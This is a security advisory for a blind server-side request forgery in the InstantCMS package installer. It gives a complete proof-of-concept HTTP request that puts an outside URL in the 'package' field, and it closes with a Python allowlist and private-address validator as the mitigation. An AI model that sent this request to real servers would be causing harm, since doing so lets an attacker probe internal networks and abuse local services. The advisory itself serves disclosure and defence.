### Critical Vulnerability Information

#### Vulnerability Type

- **Server-Side Request Forgery (SSRF) via package installer**

#### Affected Versions

- **InstantCMS <= 2.17.3**

#### Fixed Version

- **None**

#### Severity

- **CVSS v3 Base Metrics**
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: High
  - User Interaction: None
  - Scope: Unchanged
  - Confidentiality Impact: Low
  - Integrity Impact: Low
  - Availability Impact: Low
- **CVSS v3.1 Score**: 4.7/10

#### CVE ID

- **CVE-2025-59055**

#### Weakness

- **CWE-918**

#### Description

- **Summary**: A blind SSRF vulnerability exists in versions of InstantCMS prior to 2.17.3, allowing authenticated remote attackers to make the server issue arbitrary HTTP/HTTPS requests via the `package` parameter.
- **Details**: The installer functionality can be abused to have the server send any HTTP/HTTPS request to any host. This could lead to scanning internal networks, invoking local services and their functions, performing DoS attacks, disclosing the server's real IP address (if it sits behind a reverse proxy such as Cloudflare), and exhausting server resources by sending a large number of requests.

#### PoC

1. Send the following HTTP request:

```http
POST /instancms/admin/install HTTP/1.1
Host: [REDACTED]
Content-Length: 545
Cache-Control: max-age=0
Accept-Language: pl-PL,pl;q=0.9
Origin: http://[REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7JY7BrQPQNYRBYBD
Upgrade-Insecure-Requests: 1
User-Agent: [REDACTED]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application.
Referer: http://[REDACTED]/instances/admin/addons_list
Accept-Encoding: gzip, deflate, br
Cookie: icms[formadminsettings_admin]=0; icms[dashboard_chart]=%7B%22c%22%3A%22users%22%2C%22s%22%22%3A%22reg%22%2C%22i
Connection: keep-alive

------WebKitFormBoundary7JY7BrQPQNYRBYBD
Content-Disposition: form-data; name="csrf_token"

8d0ff3e67f8f9e8e1169bbbef148f24499a924ea585993bdc2e08083ec1d5922
------WebKitFormBoundary7JY7BrQPQNYRBYBD
Content-Disposition: form-data; name="addon_id"

1229
------WebKitFormBoundary7JY7BrQPQNYRBYBD
Content-Disposition: form-data; name="package"

https://ceas521dd7067c66122-ran1x2n.onetify.com/
------WebKitFormBoundary7JY7BrQPQNYRBYBD
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundary7JY7BrQPQNYRBYBD--
```

2. The server will issue the request.
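The mitigation for this class of bug is to stop the installer from fetching arbitrary URLs supplied in `package`. The check below is an added example written for this advisory, not InstantCMS code (which is PHP): it accepts only `https` URLs on an allowlist of package hosts and rejects any host whose resolved addresses are not public. The allowlist, the `FAKE_DNS` table and `fake_resolver` are constructed so it runs offline; `validate_package_url` is a hypothetical name.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Assumed allowlist of hosts the installer may download packages from
# (constructed; the advisory does not name InstantCMS's real package source).
ALLOWED_PACKAGE_HOSTS = {"addons.example.com", "mirror.example.com"}
ALLOWED_SCHEMES = {"https"}

# Constructed stand-in for socket.getaddrinfo so the example runs offline.
# mirror.example.com deliberately resolves to an RFC 1918 address.
FAKE_DNS = {
    "addons.example.com": ["93.184.216.34"],
    "mirror.example.com": ["10.0.0.5"],
}

def fake_resolver(host, port, family=0, type=0, proto=0, flags=0):
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed NXDOMAIN for %s" % host)
    return [(socket.AF_INET, socket.SOCK_STREAM, proto, "", (ip, port))
            for ip in FAKE_DNS[host]]

def is_public_address(ip):
    """True only for addresses outside loopback, private, link-local,
    multicast, reserved and unspecified ranges."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def validate_package_url(url, resolver=socket.getaddrinfo):
    """Return (ok, reason): only allowlisted https hosts whose every
    resolved address is public are accepted."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parsed.scheme
    host = (parsed.hostname or "").lower()
    if not host:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials embedded in URL"
    if host not in ALLOWED_PACKAGE_HOSTS:
        return False, "host %r not on allowlist" % host
    try:
        infos = resolver(host, parsed.port or 443, proto=socket.IPPROTO_TCP)
    except OSError as exc:
        return False, "dns failure: %s" % exc
    for info in infos:
        ip = info[4][0]  # sockaddr tuple, address first
        if not is_public_address(ip):
            return False, "%s resolves to non-public address %s" % (host, ip)
    # The downloader must connect to a validated IP (not re-resolve) and refuse
    # redirects, or DNS rebinding / a 302 to an internal host bypasses this check.
    return True, "ok"
```

The PoC's `package` value is rejected at the allowlist step before any network activity, and the deliberately private-resolving mirror host is rejected after resolution.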